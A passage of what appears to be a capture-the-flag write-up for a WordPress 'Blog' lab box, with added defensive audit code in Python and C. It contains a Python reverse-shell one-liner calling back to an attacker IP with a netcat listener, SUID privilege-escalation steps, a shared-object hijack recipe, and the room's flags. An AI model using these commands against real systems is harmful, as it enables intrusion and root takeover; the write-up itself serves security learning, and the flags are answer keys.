 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
        define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
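The wp-config.php above hands anyone with a www-data shell the database credentials, and it also sets FS_METHOD to 'direct', which lets WordPress write plugin and theme files straight to disk as the web user. As an added example (not from the write-up, and not a WordPress tool), the following audits the hardening-relevant constants in a wp-config.php. It runs on a constructed config modelled on the one dumped above with the real secrets replaced by placeholders; the checks are FS_METHOD, WP_DEBUG, the DISALLOW_FILE_EDIT/DISALLOW_FILE_MODS flags, placeholder or short salts, and a remote DB_HOST.

```python
# Added example (not from the write-up): a small audit of the settings a
# wp-config.php exposes, run against a constructed config modelled on the
# one dumped above (the real secrets are not reproduced). The checks are the
# usual hardening items: FS_METHOD 'direct' lets WordPress write plugin/theme
# files as the web user, WP_DEBUG shows notices and paths to visitors,
# placeholder salts make auth cookies forgeable, and with DISALLOW_FILE_EDIT
# / DISALLOW_FILE_MODS absent the built-in code editors and installers stay on.
import re

DEFINE_RE = re.compile(r"""define\(\s*'([A-Z0-9_]+)'\s*,\s*(?:'([^']*)'|(true|false))\s*\)""")
SALT_KEYS = ("AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
             "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT")
PLACEHOLDER = "put your unique phrase here"   # text shipped in wp-config-sample.php

def strip_comments(src: str) -> str:
    src = re.sub(r"/\*.*?\*/", "", src, flags=re.S)   # /* ... */ and /** ... */ blocks
    return re.sub(r"(?m)^\s*//[^\n]*", "", src)       # whole-line // comments only

def parse_defines(src: str) -> dict:
    """Map constant name -> value (strings stay strings, true/false -> bool)."""
    out = {}
    for name, s, b in DEFINE_RE.findall(strip_comments(src)):
        out[name] = s if b == "" else (b == "true")
    return out

def audit_wp_config(src: str) -> list:
    """Return (severity, finding) pairs, most actionable first."""
    c = parse_defines(src)
    findings = []
    if c.get("FS_METHOD") == "direct":
        findings.append(("medium", "FS_METHOD 'direct': core/plugin/theme files are written as the web user"))
    if c.get("WP_DEBUG") is True:
        findings.append(("low", "WP_DEBUG enabled: notices and paths are shown to visitors"))
    if c.get("DISALLOW_FILE_EDIT") is not True:
        findings.append(("medium", "DISALLOW_FILE_EDIT not set: theme/plugin editor is usable by admins"))
    if c.get("DISALLOW_FILE_MODS") is not True:
        findings.append(("low", "DISALLOW_FILE_MODS not set: plugins/themes can be installed from the dashboard"))
    weak = []
    for k in SALT_KEYS:
        v = c.get(k, "")
        if not isinstance(v, str) or len(v) < 32 or PLACEHOLDER in v:
            weak.append(k)
    if weak:
        findings.append(("high", "weak or placeholder salts: " + ", ".join(weak)))
    if c.get("DB_HOST", "localhost") not in ("localhost", "127.0.0.1"):
        findings.append(("info", f"database is remote ({c['DB_HOST']}); ensure it is not exposed"))
    return findings

# Constructed config in the shape of the one above; secrets are placeholders.
SAMPLE_CONFIG = """<?php
/* Custom */
/*
define('WP_HOME', '/');
define('WP_SITEURL', '/'); */
define('DB_NAME', 'blog');
define('DB_USER', 'wordpressuser');
define('DB_PASSWORD', 'REDACTED-PLACEHOLDER');
define('DB_HOST', 'localhost');
define('DB_COLLATE', '');
/** Custom FS Method */
define('FS_METHOD', 'direct');
define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'x1x2x3x4x5x6x7x8x9x0x1x2x3x4x5x6x7x8x9x0');
define('LOGGED_IN_KEY',    'x1x2x3x4x5x6x7x8x9x0x1x2x3x4x5x6x7x8x9x0');
define('NONCE_KEY',        'x1x2x3x4x5x6x7x8x9x0x1x2x3x4x5x6x7x8x9x0');
define('AUTH_SALT',        'x1x2x3x4x5x6x7x8x9x0x1x2x3x4x5x6x7x8x9x0');
define('SECURE_AUTH_SALT', 'x1x2x3x4x5x6x7x8x9x0x1x2x3x4x5x6x7x8x9x0');
define('LOGGED_IN_SALT',   'x1x2x3x4x5x6x7x8x9x0x1x2x3x4x5x6x7x8x9x0');
define('NONCE_SALT',       'x1x2x3x4x5x6x7x8x9x0x1x2x3x4x5x6x7x8x9x0');
define('WP_DEBUG', false);
"""

if __name__ == "__main__":
    for severity, text in audit_wp_config(SAMPLE_CONFIG):
        print(f"[{severity}] {text}")
```

None of these settings would have stopped the image-crop exploit used above, which works through a core bug, but they do shrink what a compromised admin account or a www-data shell can do afterwards. The two things this file cannot fix are also visible in the dump: the file is readable by the web user by design, so the database password it contains has to be treated as exposed once www-data is compromised, and the salts should be rotated to invalidate every existing session.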
meterpreter > ls
Listing: /home/bjoel
====================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
020666/rw-rw-rw-  0      cha   2023-08-02 06:28:15 -0400  .bash_history
100644/rw-r--r--  220    fil   2018-04-04 14:30:26 -0400  .bash_logout
100644/rw-r--r--  3771   fil   2018-04-04 14:30:26 -0400  .bashrc
040700/rwx------  4096   dir   2020-05-25 09:15:58 -0400  .cache
040700/rwx------  4096   dir   2020-05-25 09:15:58 -0400  .gnupg
100644/rw-r--r--  807    fil   2018-04-04 14:30:26 -0400  .profile
100644/rw-r--r--  0      fil   2020-05-25 09:16:22 -0400  .sudo_as_admin_successful
100644/rw-r--r--  69106  fil   2020-05-26 14:33:24 -0400  Billy_Joel_Termination_May20-2020.pdf
100644/rw-r--r--  57     fil   2020-05-26 16:08:47 -0400  user.txt

A hidden file was found: .sudo_as_admin_successful

www-data@blog:/home/bjoel$ python --version
python --version
Python 2.7.17

┌──(root㉿kali)-[~]
└─# nc -nvlp 4433                    
listening on [any] 4433 ...

Getting a reverse shell

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.18.72.222",4433));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

www-data@blog:/home/bjoel$ python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.18.72.222",4433));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
<no(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Note that bjoel is in the sudo and adm groups.

$ cat /etc/group
cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog,bjoel
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:bjoel
floppy:x:25:
tape:x:26:
sudo:x:27:bjoel
audio:x:29:
dip:x:30:bjoel
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:bjoel
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
systemd-journal:x:101:
systemd-network:x:102:
systemd-resolve:x:103:
input:x:104:
crontab:x:105:
syslog:x:106:
messagebus:x:107:
lxd:x:108:
mlocate:x:109:
uuidd:x:110:
ssh:x:111:
landscape:x:112:
bjoel:x:1000:
ssl-cert:x:113:
mysql:x:114:
rdma:x:115:
sambashare:x:116:
smb:x:1001:
$ groups bjoel
groups bjoel
bjoel : bjoel adm cdrom sudo dip plugdev

.sudo_as_admin_successful is a hidden file, not an environment variable. On Ubuntu, when you use the sudo command to run a command with administrator privileges, the system creates a hidden file named .sudo_as_admin_successful in the user's home directory. The presence of this file indicates that your last use of sudo succeeded in running a command with administrator privileges.

The purpose of this hidden file is to avoid re-entering the password repeatedly within a short period. When you run sudo again and the .sudo_as_admin_successful file exists, the system lets you run the command with administrator privileges directly, without asking for the password again, which improves the user experience and convenience.

Note that this hidden file applies only to your current user and only for a limited period (usually a few minutes). After that, the system asks for your password again to ensure security.

If you do not want the .sudo_as_admin_successful file to be used to avoid re-entering the password, you can delete it manually. Deleting the file has no effect on the system; you will just need to enter the password again the next time you use sudo.

The full path of the file is /home/your_username/.sudo_as_admin_successful, where your_username is your username. Since it is a hidden file, you may need to show hidden files to see it in a file browser. In a terminal, ls -a lists all files, hidden ones included.

Pentest-Cheatsheets/privilege-escalation/linux/linux-examples.rst

SUID executables: shared object injection. A shared object (.so) is the *nix analogue of a Windows DLL. If a program references a shared object that we can write to (even one that does not exist yet), we can run commands in the context of the application's user.

Find SUID/SGID executables:

$ find / -type f -a \( -perm -u+s -o -perm -u+s \) -exec ls -l {} \; 2> /dev/null
find / -type f -a \( -perm -u+s -o -perm -u+s \) -exec ls -l {} \; 2> /dev/null
-rwsr-xr-x 1 root root 59640 Mar 22  2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 40344 Mar 22  2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 75824 Mar 22  2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44528 Mar 22  2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 37136 Mar 22  2019 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 22520 Mar 27  2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 76496 Mar 22  2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 149080 Jan 31  2020 /usr/bin/sudo
-rwsr-sr-x 1 daemon daemon 51464 Feb 20  2018 /usr/bin/at
-rwsr-xr-x 1 root root 37136 Mar 22  2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 18448 Jun 28  2019 /usr/bin/traceroute6.iputils
-rwsr-sr-x 1 root root 8432 May 26  2020 /usr/sbin/checker
-rwsr-xr-x 1 root root 100760 Nov 23  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-- 1 root messagebus 42992 Jun 10  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root 109432 Oct 30  2019 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 43088 Mar  5  2020 /bin/mount
-rwsr-xr-x 1 root root 30800 Aug 11  2016 /bin/fusermount
-rwsr-xr-x 1 root root 26696 Mar  5  2020 /bin/umount
-rwsr-xr-x 1 root root 64424 Jun 28  2019 /bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22  2019 /bin/su
-rwsr-xr-x 1 root root 40152 Oct 10  2019 /snap/core/8268/bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 /snap/core/8268/bin/ping
-rwsr-xr-x 1 root root 44680 May  7  2014 /snap/core/8268/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25  2019 /snap/core/8268/bin/su
-rwsr-xr-x 1 root root 27608 Oct 10  2019 /snap/core/8268/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25  2019 /snap/core/8268/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25  2019 /snap/core/8268/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25  2019 /snap/core/8268/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25  2019 /snap/core/8268/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25  2019 /snap/core/8268/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Oct 11  2019 /snap/core/8268/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jun 10  2019 /snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar  4  2019 /snap/core/8268/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 106696 Dec  6  2019 /snap/core/8268/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Jun 12  2018 /snap/core/8268/usr/sbin/pppd
-rwsr-xr-x 1 root root 40152 Jan 27  2020 /snap/core/9066/bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 /snap/core/9066/bin/ping
-rwsr-xr-x 1 root root 44680 May  7  2014 /snap/core/9066/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25  2019 /snap/core/9066/bin/su
-rwsr-xr-x 1 root root 27608 Jan 27  2020 /snap/core/9066/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25  2019 /snap/core/9066/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25  2019 /snap/core/9066/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25  2019 /snap/core/9066/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25  2019 /snap/core/9066/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25  2019 /snap/core/9066/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jan 31  2020 /snap/core/9066/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Nov 29  2019 /snap/core/9066/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar  4  2019 /snap/core/9066/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 110792 Apr 10  2020 /snap/core/9066/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Feb 11  2020 /snap/core/9066/usr/sbin/pppd

Use strace to look for references to shared objects:

$ strace /usr/sbin/checker 2>&1 | grep -iE "open|access|no such file"
strace /usr/sbin/checker 2>&1 | grep -iE "open|access|no such file"
access("/etc/suid-debug", F_OK)         = -1 ENOENT (No such file or directory)
access("/etc/suid-debug", F_OK)         = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 4
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 4
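
The two checks just shown, the SUID/SGID listing and the strace library-load trace, as a small triage program. This is an added example, not code from the cheatsheet or the box. It keeps only the lines that merit review: SUID paths outside an assumed baseline list (which is how checker stands out from the listing above), and library loads that fail with ENOENT under a directory a low-privileged user can write to (here a constructed writable_prefixes list; on a real host test each directory with access(dir, W_OK)). Every sample line is constructed, including the /home/bjoel/.config/libcalc.so load. One caveat on the find command above: it tests -perm -u+s twice, so it lists SUID files only; the second test has to be -perm -g+s to include SGID files.

```c
/* so_hijack_audit.c: triage for the two checks above, the SUID/SGID listing and the
 * strace library-load trace. Added example, not from the cheatsheet or the box.
 * Input lines are constructed samples in the format of the real output; writable_prefixes
 * stands in for directories a low-privileged user can write to (on a real host, test
 * each directory with access(dir, W_OK) instead). */
#include <stdio.h>
#include <string.h>

/* Assumed baseline of SUID paths expected on an Ubuntu host; anything outside it
 * gets manual review, which is how /usr/sbin/checker stood out. */
static const char *const suid_baseline[] = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", NULL
};

/* Constructed ls -l lines, same shape as the find -exec ls -l output above */
static const char *const sample_suid_listing[] = {
    "-rwsr-xr-x 1 root root 59640 Mar 22  2019 /usr/bin/passwd",
    "-rwsr-sr-x 1 root root 8432 May 26  2020 /usr/sbin/checker",
    "-rwsr-xr-x 1 root root 44664 Mar 22  2019 /bin/su",
    NULL
};

/* Constructed strace lines; the last one is the pattern the cheatsheet warns about */
static const char *const sample_trace[] = {
    "access(\"/etc/ld.so.preload\", R_OK)      = -1 ENOENT (No such file or directory)",
    "openat(AT_FDCWD, \"/etc/ld.so.cache\", O_RDONLY|O_CLOEXEC) = 4",
    "openat(AT_FDCWD, \"/lib/x86_64-linux-gnu/libc.so.6\", O_RDONLY|O_CLOEXEC) = 4",
    "openat(AT_FDCWD, \"/home/bjoel/.config/libcalc.so\", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)",
    NULL
};

static const char *const writable_prefixes[] = { "/home/bjoel/", "/tmp/", NULL };

int in_list(const char *path, const char *const *list)
{
    for (; *list; list++)
        if (strcmp(path, *list) == 0) return 1;
    return 0;
}

/* Count SUID binaries outside the baseline; the path is the last field of an
 * ls -l line. The first unexpected path is copied into 'first'. */
int unexpected_suid(const char *const *listing, char *first, size_t n)
{
    int count = 0;
    for (; *listing; listing++) {
        const char *sp = strrchr(*listing, ' ');
        const char *path = sp ? sp + 1 : *listing;
        if (in_list(path, suid_baseline)) continue;
        if (count == 0 && first && n > 0) {
            strncpy(first, path, n - 1);
            first[n - 1] = '\0';
        }
        count++;
    }
    return count;
}

/* Copy the first double-quoted argument of a strace line into buf */
static int quoted_path(const char *line, char *buf, size_t n)
{
    const char *start = strchr(line, '"');
    if (!start) return 0;
    const char *end = strchr(++start, '"');
    if (!end || (size_t)(end - start) >= n) return 0;
    memcpy(buf, start, (size_t)(end - start));
    buf[end - start] = '\0';
    return 1;
}

/* The finding: a shared object the binary tries to load, which does not exist, under
 * a directory a low-privileged user can write to. An ENOENT on a .so path is noise
 * by itself (the loader probes many paths); writability is what makes it a finding. */
int is_hijackable_load(const char *line, const char *const *prefixes)
{
    char path[512];
    if (!quoted_path(line, path, sizeof path) || strstr(path, ".so") == NULL) return 0;
    if (strstr(line, "ENOENT") == NULL) return 0;
    for (; *prefixes; prefixes++)
        if (strncmp(path, *prefixes, strlen(*prefixes)) == 0) return 1;
    return 0;
}

int count_hijackable(const char *const *trace, const char *const *prefixes)
{
    int count = 0;
    for (; *trace; trace++) count += is_hijackable_load(*trace, prefixes);
    return count;
}

int main(void)
{
    char first[512] = "";
    int n = unexpected_suid(sample_suid_listing, first, sizeof first);
    printf("%d SUID binaries outside the baseline, first: %s\n", n, first);
    printf("%d hijackable library loads in the trace\n", count_hijackable(sample_trace, writable_prefixes));
    return 0;
}
```

On the constructed input this reports one SUID binary outside the baseline (/usr/sbin/checker) and one hijackable load. The remediation side of such a finding is the usual one: the referenced library path should be owned by root and live in a root-owned directory, or the binary's RPATH/RUNPATH should be fixed so it never probes user-writable locations.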

GTFOBins

/usr/sbin/checker is not a common SUID binary!

$ checker
checker
Not an Admin
$ ls -al /usr/sbin/checker
ls -al /usr/sbin/checker
-rwsr-sr-x 1 root root 8432 May 26  2020 /usr/sbin/checker
$ ltrace checker
ltrace checker
getenv("admin")                                  = nil
puts("Not an Admin"Not an Admin
)                             = 13
+++ exited (status 0) +++
$ env
env
SHLVL=1
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
JOURNAL_STREAM=9:19937
_=checker
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
INVOCATION_ID=bf008a68e4af4e379e925a112018a4fc
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
APACHE_RUN_GROUP=www-data
APACHE_RUN_USER=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/home/bjoel
$ echo $admin
echo $admin
$ admin='1'
admin='1'
$ echo $admin
echo $admin
1

The ltrace output turns out to be dynamic: once the environment variable admin is set, the binary calls setuid(0) and executes /bin/bash.

root@blog:/root# ltrace /usr/sbin/checker
ltrace /usr/sbin/checker
getenv("admin")                                  = "1"
setuid(0)                                        = 0
system("/bin/bash"
$ /usr/sbin/checker 
/usr/sbin/checker
root@blog:/home/bjoel# whoami
whoami
root
root@blog:/home/bjoel# id
id
uid=0(root) gid=33(www-data) groups=33(www-data)
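
The branch logic that ltrace exposed, reconstructed as plain C beside a hardened version, as an added example (this is not the binary from the box). policy_vulnerable() is what checker does: the only test is whether getenv("admin") returns non-NULL, so whoever runs the SUID binary decides the outcome, and even admin= with an empty value passes, because getenv() then returns a pointer to "" rather than NULL. policy_hardened() decides from the real uid and the supplementary groups, which the kernel maintains and the caller cannot forge; the admin group id 27 used in main() is the sudo group from the /etc/group listing above and is an assumption for this demonstration. drop_privileges() is the DENY path a SUID program should take before doing anything else.

```c
/* checker_policy.c: the authorisation logic that ltrace exposed in /usr/sbin/checker,
 * reconstructed as plain C next to a hardened version. Added example, not the binary
 * from the box; the admin group id in main() (27, the sudo group from /etc/group above)
 * is an assumption for the demonstration. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

enum action { DENY = 0, ALLOW = 1 };

/* Vulnerable policy, exactly what ltrace showed: getenv("admin") is the only test.
 * The environment belongs to whoever executes the SUID binary, so any local user can
 * take the privileged branch. An empty value passes too: getenv() returns a pointer to
 * "" for admin= and NULL only when the variable is absent. */
enum action policy_vulnerable(const char *admin_env)
{
    if (admin_env == NULL)
        return DENY;            /* original: puts("Not an Admin") */
    return ALLOW;               /* original: setuid(0); system("/bin/bash") */
}

/* Hardened policy: the decision derives only from kernel-maintained identity
 * (real uid and supplementary groups), which the caller cannot forge. */
enum action policy_hardened(uid_t real_uid, const gid_t *groups, int ngroups, gid_t admin_gid)
{
    if (real_uid == 0)
        return ALLOW;
    for (int i = 0; i < ngroups; i++)
        if (groups[i] == admin_gid)
            return ALLOW;
    return DENY;
}

/* On the DENY path a SUID program must give up its elevated ids before doing
 * anything else. Order matters: the gid has to be dropped while still root.
 * Returns 0 only when the process really runs as (real_uid, real_gid) afterwards. */
int drop_privileges(uid_t real_uid, gid_t real_gid)
{
    if (setgid(real_gid) != 0)
        return -1;
    if (setuid(real_uid) != 0)
        return -1;
    /* verify instead of trusting the return codes alone */
    if (getuid() != real_uid || geteuid() != real_uid || getgid() != real_gid)
        return -1;
    return 0;
}

int main(void)
{
    gid_t groups[64];
    int ngroups = getgroups(64, groups);
    if (ngroups < 0)
        ngroups = 0;
    gid_t admin_gid = 27;       /* assumption: sudo group, gid 27 per /etc/group above */
    const char *admin_env = getenv("admin");

    printf("vulnerable policy (admin=%s): %s\n",
           admin_env ? admin_env : "<unset>",
           policy_vulnerable(admin_env) == ALLOW ? "ALLOW" : "DENY");
    printf("hardened policy (uid %u, %d groups): %s\n",
           (unsigned)getuid(), ngroups,
           policy_hardened(getuid(), groups, ngroups, admin_gid) == ALLOW ? "ALLOW" : "DENY");

    if (drop_privileges(getuid(), getgid()) != 0) {
        perror("drop_privileges");
        return 1;
    }
    return 0;
}
```

Two further points the reconstruction makes visible: system() hands its argument to /bin/sh -c with the caller's environment intact, so even the ALLOW path of a SUID program should execve() a fixed path with a minimal environment; and the return value of setuid() has to be checked, since a failed call leaves the process with whatever ids it had.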
root@blog:/home/bjoel# cd /root
cd /root
root@blog:/root# ls
ls
root.txt
root@blog:/root# cat root.txt
cat root.txt
9a0b2b618bef9bfa7ac28c1353d9f318
root@blog:/root# find / -name user.txt
find / -name user.txt
/home/bjoel/user.txt
/media/usb/user.txt
find: '/proc/2176/task/2176/net': Invalid argument
find: '/proc/2176/net': Invalid argument
find: '/proc/4526/task/4526/net': Invalid argument
find: '/proc/4526/net': Invalid argument
find: '/proc/4534/task/4534/net': Invalid argument
find: '/proc/4534/net': Invalid argument
root@blog:/root# cat /home/bjoel/user.txt
cat /home/bjoel/user.txt
You won't find what you're looking for here.

TRY HARDER
root@blog:/root# cat /media/usb/user.txt
cat /media/usb/user.txt
c8421899aae571f7af486492b71a8ab7

root.txt

9a0b2b618bef9bfa7ac28c1353d9f318

user.txt

c8421899aae571f7af486492b71a8ab7

Where was user.txt found?

/media/usb

What CMS was Billy using?

Wordpress

What version of the above CMS was being used?

5.0

Task 2: Credits

Congratulations!

Summary: I got stuck while brute-forcing the WordPress login password with hydra, because I had not set the error message returned on a failed login correctly, so hydra could not tell whether a login had failed. I also got stuck at the SUID privilege escalation step. At first I was looking for missing shared object references in SUID binaries: if the shared object lives in a writable directory, create a C file containing setresuid(0,0,0); setresgid(0,0,0); system("/bin/bash");, compile it into a shared object, and move it to the path referenced by the SUID binary; running the SUID binary again then yields a root shell. Unfortunately this room is a CTF challenge and a variation on that standard technique. Note that ltrace output changes dynamically with the binary's execution flow, just like if branches. We first search for files with SUID set, use GTFOBins to rule out legitimate Unix binaries, and find that /usr/sbin/checker is not a common binary. /usr/sbin/checker is owned by root and has the SUID bit set. Tracing it with ltrace shows that it reads the environment variable admin; if admin is empty, it prints Not an Admin and exits. If we assign admin a value, the program takes the other branch: setuid(0), then /bin/bash. That gives us a bash shell running as root. Without the write-up I would never have thought of this SUID privilege escalation step, but this room taught me ltrace, GTFOBins and the SUID privesc approach, so it was worthwhile.